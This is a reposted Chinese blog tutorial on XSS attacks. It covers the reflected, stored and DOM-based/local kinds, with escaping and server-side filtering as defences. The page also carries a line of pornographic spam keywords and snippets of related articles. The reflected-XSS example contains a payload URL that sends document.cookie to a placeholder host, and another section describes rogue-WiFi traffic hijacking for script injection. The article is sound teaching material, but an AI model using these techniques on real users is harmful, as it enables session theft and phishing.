成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專(zhuān)欄INFORMATION COLUMN

前端安全之XSS攻擊

lmxdawn / 408人閱讀

摘要:跨域腳本攻擊攻擊是最常見(jiàn)的攻擊,其重點(diǎn)是跨域和客戶端執(zhí)行。后端接收請(qǐng)求時(shí),驗(yàn)證請(qǐng)求是否為攻擊請(qǐng)求,攻擊則屏蔽。開(kāi)發(fā)安全措施首要是服務(wù)端要進(jìn)行過(guò)濾,因?yàn)榍岸说男r?yàn)可以被繞過(guò)。這種直接存在于頁(yè)面,無(wú)須經(jīng)過(guò)服務(wù)器返回就是基于本地的攻擊。

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見(jiàn)的Web攻擊,其重點(diǎn)是“跨域”和“客戶端執(zhí)行”。有人將XSS攻擊分為三種,分別是:

Reflected XSS(基于反射的XSS攻擊)

Stored XSS(基于存儲(chǔ)的XSS攻擊)

DOM-based or local XSS(基于DOM或本地的XSS攻擊)

Reflected XSS

基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊。

例子:

做個(gè)假設(shè),當(dāng)亞馬遜在搜索書(shū)籍,搜不到書(shū)的時(shí)候顯示提交的名稱(chēng)。

在搜索框搜索內(nèi)容,填入“”, 點(diǎn)擊搜索。

當(dāng)前端頁(yè)面沒(méi)有對(duì)返回的數(shù)據(jù)進(jìn)行過(guò)濾,直接顯示在頁(yè)面上, 這時(shí)就會(huì)alert那個(gè)字符串出來(lái)。

進(jìn)而可以構(gòu)造獲取用戶cookies的地址,通過(guò)QQ群或者垃圾郵件,來(lái)讓其他人點(diǎn)擊這個(gè)地址:

http://www.amazon.cn/search?n..."http://xxx/get?cookie="+document.cookie
PS:這個(gè)地址當(dāng)然是沒(méi)效的,只是舉例子而已。

結(jié)論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個(gè)像樣的XSS攻擊。

開(kāi)發(fā)安全措施:

前端在顯示服務(wù)端數(shù)據(jù)時(shí)候,不僅是標(biāo)簽內(nèi)容需要過(guò)濾、轉(zhuǎn)義,就連屬性值也都可能需要。

后端接收請(qǐng)求時(shí),驗(yàn)證請(qǐng)求是否為攻擊請(qǐng)求,攻擊則屏蔽。

例如:

標(biāo)簽:


轉(zhuǎn)義

后端沒(méi)有對(duì)文章進(jìn)行過(guò)濾,直接保存文章內(nèi)容到數(shù)據(jù)庫(kù)。

當(dāng)其他看這篇文章的時(shí)候,包含的惡意腳本就會(huì)執(zhí)行。

PS:因?yàn)榇蟛糠治恼率潜4嬲麄€(gè)HTML內(nèi)容的,前端顯示時(shí)候也不做過(guò)濾,就極可能出現(xiàn)這種情況。

結(jié)論:

后端盡可能對(duì)提交數(shù)據(jù)做過(guò)濾,在場(chǎng)景需求而不過(guò)濾的情況下,前端就需要做些處理了。

開(kāi)發(fā)安全措施:

首要是服務(wù)端要進(jìn)行過(guò)濾,因?yàn)榍岸说男r?yàn)可以被繞過(guò)。

當(dāng)服務(wù)端不校驗(yàn)時(shí)候,前端要以各種方式過(guò)濾里面可能的惡意腳本,例如script標(biāo)簽,將特殊字符轉(zhuǎn)換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個(gè)免費(fèi)的wifi,但是提供免費(fèi)wifi的網(wǎng)關(guān)會(huì)往你訪問(wèn)的任何頁(yè)面插入一段腳本或者是直接返回一個(gè)釣魚(yú)頁(yè)面,從而植入惡意腳本。這種直接存在于頁(yè)面,無(wú)須經(jīng)過(guò)服務(wù)器返回就是基于本地的XSS攻擊。

例子1:

提供一個(gè)免費(fèi)的wifi。

開(kāi)啟一個(gè)特殊的DNS服務(wù),將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設(shè)置為我們的電腦IP。

之后連上wifi的用戶打開(kāi)任何網(wǎng)站,請(qǐng)求都將被我們截取到。我們根據(jù)http頭中的host字段來(lái)轉(zhuǎn)發(fā)到真正服務(wù)器上。

收到服務(wù)器返回的數(shù)據(jù)之后,我們就可以實(shí)現(xiàn)網(wǎng)頁(yè)腳本的注入,并返回給用戶。

當(dāng)注入的腳本被執(zhí)行,用戶的瀏覽器將依次預(yù)加載各大網(wǎng)站的常用腳本庫(kù)。

這個(gè)其實(shí)就是wifi流量劫持,中間人可以看到用戶的每一個(gè)請(qǐng)求,可以在頁(yè)面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚(yú)頁(yè)面。

PS:本文轉(zhuǎn)自 http://www.cnblogs.com/loveso...

文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/81613.html

相關(guān)文章

  • 【面試篇】寒冬求職你必須要懂的Web安全

    摘要:禁止內(nèi)聯(lián)腳本執(zhí)行規(guī)則較嚴(yán)格,目前發(fā)現(xiàn)使用。典型的攻擊流程受害者登錄站點(diǎn),并保留了登錄憑證。站點(diǎn)接收到請(qǐng)求后,對(duì)請(qǐng)求進(jìn)行驗(yàn)證,并確認(rèn)是受害者的憑證,誤以為是無(wú)辜的受害者發(fā)送的請(qǐng)求。攻擊完成,攻擊者在受害者不知情的情況下,冒充受害者完成了攻擊。 隨著互聯(lián)網(wǎng)的發(fā)展,各種Web應(yīng)用變得越來(lái)越復(fù)雜,滿足了用戶的各種需求的同時(shí),各種網(wǎng)絡(luò)安全問(wèn)題也接踵而至。作為前端工程師的我們也逃不開(kāi)這個(gè)問(wèn)題,今天一起...

    yeyan1996 評(píng)論0 收藏0

  • 【面試篇】寒冬求職你必須要懂的Web安全

    摘要:禁止內(nèi)聯(lián)腳本執(zhí)行規(guī)則較嚴(yán)格,目前發(fā)現(xiàn)使用。典型的攻擊流程受害者登錄站點(diǎn),并保留了登錄憑證。站點(diǎn)接收到請(qǐng)求后,對(duì)請(qǐng)求進(jìn)行驗(yàn)證,并確認(rèn)是受害者的憑證,誤以為是無(wú)辜的受害者發(fā)送的請(qǐng)求。攻擊完成,攻擊者在受害者不知情的情況下,冒充受害者完成了攻擊。 隨著互聯(lián)網(wǎng)的發(fā)展,各種Web應(yīng)用變得越來(lái)越復(fù)雜,滿足了用戶的各種需求的同時(shí),各種網(wǎng)絡(luò)安全問(wèn)題也接踵而至。作為前端工程師的我們也逃不開(kāi)這個(gè)問(wèn)題,今天...

    charles_paul 評(píng)論0 收藏0

  • web 應(yīng)用常見(jiàn)安全漏洞一覽

    摘要:應(yīng)用常見(jiàn)安全漏洞一覽注入注入就是通過(guò)給應(yīng)用接口傳入一些特殊字符,達(dá)到欺騙服務(wù)器執(zhí)行惡意的命令。此外,適當(dāng)?shù)臋?quán)限控制不曝露必要的安全信息和日志也有助于預(yù)防注入漏洞。 web 應(yīng)用常見(jiàn)安全漏洞一覽 1. SQL 注入 SQL 注入就是通過(guò)給 web 應(yīng)用接口傳入一些特殊字符,達(dá)到欺騙服務(wù)器執(zhí)行惡意的 SQL 命令。 SQL 注入漏洞屬于后端的范疇,但前端也可做體驗(yàn)上的優(yōu)化。 原因 當(dāng)使用外...

    darkerXi 評(píng)論0 收藏0

  • web 應(yīng)用常見(jiàn)安全漏洞一覽

    摘要:應(yīng)用常見(jiàn)安全漏洞一覽注入注入就是通過(guò)給應(yīng)用接口傳入一些特殊字符,達(dá)到欺騙服務(wù)器執(zhí)行惡意的命令。此外,適當(dāng)?shù)臋?quán)限控制不曝露必要的安全信息和日志也有助于預(yù)防注入漏洞。 web 應(yīng)用常見(jiàn)安全漏洞一覽 1. SQL 注入 SQL 注入就是通過(guò)給 web 應(yīng)用接口傳入一些特殊字符,達(dá)到欺騙服務(wù)器執(zhí)行惡意的 SQL 命令。 SQL 注入漏洞屬于后端的范疇,但前端也可做體驗(yàn)上的優(yōu)化。 原因 當(dāng)使用外...

    Panda 評(píng)論0 收藏0

  • Web 安全漏洞 XSS 攻擊

    摘要:是一種經(jīng)常出現(xiàn)在應(yīng)用程序中的計(jì)算機(jī)安全漏洞,是由于應(yīng)用程序?qū)τ脩舻妮斎脒^(guò)濾不足而產(chǎn)生的。常見(jiàn)的攻擊有三種反射型型存儲(chǔ)型。但是作為開(kāi)發(fā)人員依然要了解基本知識(shí)于細(xì)節(jié)處避免制造漏洞。 showImg(https://segmentfault.com/img/bVbjJDk); 編者說(shuō):作為JS系工程師接觸最多的漏洞我想就是 XSS 漏洞了,然鵝并不是所有的同學(xué)對(duì)其都有一個(gè)清晰的認(rèn)識(shí)。今天我們...

    lieeps 評(píng)論0 收藏0

發(fā)表評(píng)論

0條評(píng)論

最新活動(dòng)
閱讀需要支付1元查看
<